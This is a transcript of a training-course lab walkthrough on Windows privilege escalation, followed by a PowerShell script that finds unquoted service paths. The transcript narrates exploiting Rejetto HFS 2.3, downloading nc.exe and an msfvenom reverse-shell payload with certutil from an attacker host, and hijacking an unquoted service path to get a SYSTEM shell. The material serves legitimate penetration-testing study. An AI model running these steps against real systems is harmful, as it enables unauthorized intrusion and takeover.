Privilege Escalation Walkthrough: Windows

Time: 21 hours 43 minutes
Difficulty: Intermediate
CEU/CPE: 22
Video Transcription
00:01
Welcome to the privilege escalation lab walkthrough.
00:07
Buckle your seat belts, because we're gonna be here for a while. So the unintended exploitation path that I had hinted at is using PsExec on the Windows box.
00:17
If we are able to figure out the username and password,
00:23
which you've seen before, right? The administrator password on the Windows box, and use Impacket psexec. You saw this in the slides
00:30
that I showed you about using PsExec. But if I do this, whoami?
00:35
Well, I'm SYSTEM.
00:37
That's the easy way. Now let's go to the intended exploitation path.
00:42
So if we go, and I hinted it was a web-based exploitation path.
00:48
So if we go to 192.168.1.19,
00:53
you'll notice a file server
00:57
that looks interesting.
00:59
Also, if you look at the link, it's Rejetto HFS,
01:04
and we have a version at 2.3,
01:07
so we can use searchsploit for Rejetto.
01:15
And we see we have a Python script here.
01:23
So you can do this in Metasploit, or you can do it not. I'm gonna show you how to not do it in Metasploit, because we don't rely on Metasploit for OSCP.
01:33
So what I will do is searchsploit
01:37
-m
01:42
and I'm going to take a look at this now. It's
01:47
39
01:49
Again, we're looking at code, we're reading the code. We need to understand what we need to change here.
01:59
So I see local IP and local port number again. They put comments here, which is very nice.
02:05
So I need to put my box
02:08
and whatever port I want my netcat listener on. It will tell you
02:13
your netcat needs to be on a web server. Well, why don't we just use our web server? We can leave that. Well, let's make this 5555; we'll make things a little different here,
02:25
but
02:29
I'm going to use locate nc.exe.
02:32
And here's netcat. So I'm gonna put this, or move this,
02:38
to our
02:40
/var/www/
02:43
html.
02:50
Also, copy might be the better way to go.
02:53
Mhm,
02:54
copy
03:00
nc.exe.
03:04
Okay, so now I need to start my server, right.
03:07
systemctl start apache2.
03:13
All right.
03:16
So now I'm going to need to do,
03:21
let's split this,
03:23
start my netcat listener,
03:25
port 5555,
03:29
as I'm going to try to run this script.
03:32
You specify our
03:35
Windows host,
03:37
19,
03:38
port 80.
03:46
Yeah.
03:52
There we go. It says you may need to run it a few times, but now we are on user one's desktop.
03:58
So now what we want to do is escalate privileges, right? whoami.
04:03
We're user1. net user user1. Are we administrator? No, we're not.
04:11
So what we want to do is, I talked about the PowerUp script.
04:15
So what I can do is locate PowerUp.ps1,
04:23
and I see it here. So what I want to do is
04:27
I want to copy it
04:30
right here.
04:32
I'm gonna start
04:33
my server,
04:36
http.server,
04:44
python3.
04:47
So what I'm gonna do is I need to use certutil to download this.
04:51
-urlcache
04:54
-f http://
04:57
192.168.1.50:
05:01
8000/
05:05
PowerUp.ps1
05:10
PowerUp.ps1.
05:14
All right, we see that we got that. We can check the directory; we see that.
05:17
So I need to go into PowerShell now.
05:21
What I'm gonna do is Import-
05:25
Module
05:28
PowerUp.ps1
05:32
and Invoke-
05:35
AllChecks.
05:40
So it's checking. We see checking for unquoted service path, and it found it, right?
05:46
It found some other things as well,
05:47
but let's take a look at unquoted service path.
05:54
We see we have temp unquoted path. Well, that's a clue, right?
05:58
So you guys saw this in the
06:01
lesson.
06:03
So if we make
06:05
unquoted.exe, and if we can start or stop this service,
06:11
we can get a shell as SYSTEM.
06:15
So I'm not gonna use PowerUp. I'm gonna make my own thing here. So I will
06:21
do msfvenom,
06:25
payload is windows/shell_reverse_tcp,
06:31
LHOST is me,
06:36
LPORT
06:40
1234.
06:43
We're gonna do format is exe, and we're gonna do unquoted.exe.
06:59
Just waiting for this to...
07:01
There we go. Make that.
07:03
So I want to use certutil again. But why don't I just change directories to temp?
07:13
So cert
07:14
util.
07:15
You can see that I am in the root directory for my user.
07:23
So root, that shell should be in here. certutil
07:28
-urlcache
07:30
-f http://
07:31
192.168.1.
07:35
50:8000/
07:40
unquoted.exe unquoted.exe.
07:48
dir.
07:53
Now we can try to see if we can start or stop this service.
08:01
So the service name is unquoted service.
08:05
So I'm going to get a PowerShell
08:20
and also start my listener.
08:24
123
08:26
1234.
08:31
sc
08:33
start.
08:37
So we see access is denied. So what do I do now? I can try to shut down this machine
08:45
and restart it and see what happens.
08:50
So if we restart, this unquoted.exe should make our shell, or activate our shell here.
08:58
But it might take a while,
09:01
because when we give the shutdown signal, I think it gives it about a minute
09:05
to shut down. So we have to wait here patiently
09:07
to get our shell.
09:18
So we see the system has restarted here to kick this off.
09:24
So now again, we're waiting patiently to see if we get a shell here,
09:35
and there we go.
09:37
whoami
09:39
Now we're SYSTEM.
09:41
So we have successfully gotten from user1
09:46
to,
09:48
well, we don't even need that, to SYSTEM. So I can,
09:52
for OSCP land, you're gonna change directory: Users,
09:56
change directory Administrator,
10:01
change directory Desktop.
10:03
And we see that there's a flag there, flag.txt.
10:09
Yeah.
10:09
So there you go. There is your proof flag right there.
10:15
All right. So that's the Windows machine,
10:18
both unintended and intended exploitation path. Now let's pivot over
10:24
to the Linux box.
10:28
But what I'm going to do is
10:31
make another video for that. So if you want to go over the Windows machine,
10:35
go ahead. Um, but this is part one for the Windows machine, and I will make a part two for the Linux machine.
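The unquoted service path check that the walkthrough runs through PowerUp's Invoke-AllChecks, written out as a standalone PowerShell script so you can see what the check actually does. This is an added example, not the instructor's code and not PowerUp's; the function names Get-UnquotedServicePath and Test-DirectoryWritable are my own. For each service whose ImagePath is unquoted and contains a space, it lists the paths Windows will probe in order (CreateProcess splits the command line at each space and appends .exe), and tests whether the current user can write to each candidate directory. It is read-only: it creates and deletes a random probe file and nothing else.

```powershell
# Added example: enumerate unquoted service paths and the hijack candidates
# they create. Not part of the original walkthrough; run as the low-priv user.

function Test-DirectoryWritable {
    param([string]$Dir)
    if (-not (Test-Path -LiteralPath $Dir -PathType Container)) { return $false }
    # Probe by creating and deleting a random file rather than parsing ACLs;
    # this reflects effective permissions, including group and inherited ACEs.
    $probe = Join-Path $Dir ([IO.Path]::GetRandomFileName())
    try {
        [IO.File]::WriteAllText($probe, '')
        Remove-Item -LiteralPath $probe -Force
        return $true
    } catch {
        return $false
    }
}

function Get-UnquotedServicePath {
    [CmdletBinding()]
    param()

    # Win32_Service.PathName is the raw ImagePath, arguments included.
    foreach ($svc in Get-CimInstance -ClassName Win32_Service) {
        $path = $svc.PathName
        if (-not $path) { continue }
        # A leading quote means the path is already safe.
        if ($path.StartsWith('"')) { continue }
        # Keep only the executable portion, dropping any arguments.
        $m = [regex]::Match($path, '^(.*?\.exe)', 'IgnoreCase')
        if (-not $m.Success) { continue }
        $exe = $m.Groups[1].Value
        if ($exe -notmatch ' ') { continue }

        # For "C:\Program Files\My App\svc.exe" Windows tries, in order:
        #   C:\Program.exe, C:\Program Files\My.exe, then the real binary.
        $parts = $exe -split ' '
        for ($i = 1; $i -lt $parts.Count; $i++) {
            $cand = ($parts[0..($i - 1)] -join ' ') + '.exe'
            $dir  = Split-Path -Parent $cand
            [PSCustomObject]@{
                Service     = $svc.Name
                RunsAs      = $svc.StartName   # LocalSystem is the prize
                StartMode   = $svc.StartMode   # Auto means a reboot will trigger it
                ImagePath   = $exe
                HijackPath  = $cand
                DirWritable = Test-DirectoryWritable $dir
            }
        }
    }
}

# Only candidates we can actually plant a binary at are useful.
Get-UnquotedServicePath | Where-Object DirWritable | Format-Table -AutoSize
```

Two things the output does not settle on its own, and which the walkthrough ran into: whether you can start the service yourself (`sc.exe start <name>` returned access denied in the video), and if not, whether its StartMode is Auto so that a reboot (or `shutdown /r /t 0`, as the instructor did) will run your planted binary as the service's RunsAs account. A candidate with DirWritable true, RunsAs LocalSystem and StartMode Auto is the case the lab demonstrates.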